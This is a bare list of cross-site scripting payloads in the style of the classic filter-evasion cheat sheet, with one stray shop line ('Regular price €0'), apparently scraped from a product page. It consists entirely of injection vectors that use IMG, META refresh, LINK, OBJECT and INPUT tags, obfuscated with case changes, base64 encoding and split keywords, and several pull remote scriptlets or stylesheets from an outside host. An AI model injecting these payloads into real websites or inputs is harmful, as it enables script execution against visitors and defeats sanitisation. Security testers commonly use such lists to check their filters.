alert("XSS");
<IMG SRC=JaVaScRiPt:alert('XSS')>
Regular price €0
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\" javascript:alert('XSS');\">
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"javascript:alert('XSS')\"
<IMG SRC=\"livescript:[code]\">
<IMG SRC=\"mocha:[code]\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>